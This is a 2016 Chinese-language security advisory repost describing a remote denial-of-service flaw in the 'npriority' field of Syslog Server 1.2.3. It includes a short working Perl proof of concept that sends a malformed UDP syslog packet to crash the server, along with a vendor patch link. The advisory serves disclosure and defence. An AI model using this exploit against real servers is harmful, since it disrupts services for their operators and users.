你好,游客 登录 注册 搜索
背景:
阅读新闻

Syslog Server “npriority”字段远程拒绝服务漏洞

[日期:2016-07-07] 来源:Linux社区  作者:Linux [字体: ]
Syslog Server "npriority"字段远程拒绝服务漏洞


发布日期:2016-07-04
更新日期:2016-07-07

受影响系统:

Syslog Server Syslog Server 1.2.3

描述:


Syslog Server是适用于Windows系统的syslog服务器。

syslog Server未能处理npriority字段的内容,存在安全漏洞,构造的数据包可导致服务器崩溃。

<*来源:ChaoYi.Huang_at_connect.polyu.hk
  *>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);
$|=1;

$host=shift;
$port=shift;

die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));

$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";

$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;

$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
$con->send($packet);
print "Done!\n";
$con->close;

exit(0);

建议:


厂商补丁:

Syslog Server
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://sourceforge.net/p/syslog-server/

本文永久更新链接地址http://www.linuxidc.com/Linux/2016-07/132990.htm

linux
相关资讯       Syslog